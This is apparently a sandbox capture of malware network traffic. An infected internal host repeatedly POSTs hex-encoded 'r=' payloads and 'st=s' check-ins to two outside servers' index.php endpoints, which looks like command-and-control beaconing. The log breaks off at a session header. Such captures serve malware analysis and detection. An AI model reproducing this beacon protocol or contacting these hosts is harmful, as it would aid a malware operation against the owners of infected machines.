                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1462 | 192.168.2.5 | 51317 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:41.050071955 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:41.298599005 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1463 | 192.168.2.5 | 51319 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:41.632816076 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:41.875309944 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1464 | 192.168.2.5 | 51318 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:41.637824059 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:41.890289068 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1465 | 192.168.2.5 | 51320 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:42.129074097 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:42.383872986 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1466 | 192.168.2.5 | 51321 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:42.143060923 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:42.395394087 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1467 | 192.168.2.5 | 51322 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:42.727334023 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.970541000 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1468 | 192.168.2.5 | 51323 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.735476971 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:42.987533092 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1469 | 192.168.2.5 | 51324 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.218916893 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.465962887 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1470 | 192.168.2.5 | 51325 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.239856005 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.491378069 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1471 | 192.168.2.5 | 51326 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.800664902 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.042922974 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1472 | 192.168.2.5 | 51327 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:43.821569920 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.069855928 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1473 | 192.168.2.5 | 51328 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.293474913 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:44.541182995 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1474 | 192.168.2.5 | 51329 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:44.315207005 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:44.560560942 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1475 | 192.168.2.5 | 51331 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:44.885476112 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:45.131997108 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1476 | 192.168.2.5 | 51332 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:44.909117937 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:45.161901951 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1477 | 192.168.2.5 | 51333 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:45.386396885 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:45.637376070 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1478 | 192.168.2.5 | 51334 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:45.492233992 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:45.735397100 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1479 | 192.168.2.5 | 51335 | 193.233.132.56 | 80
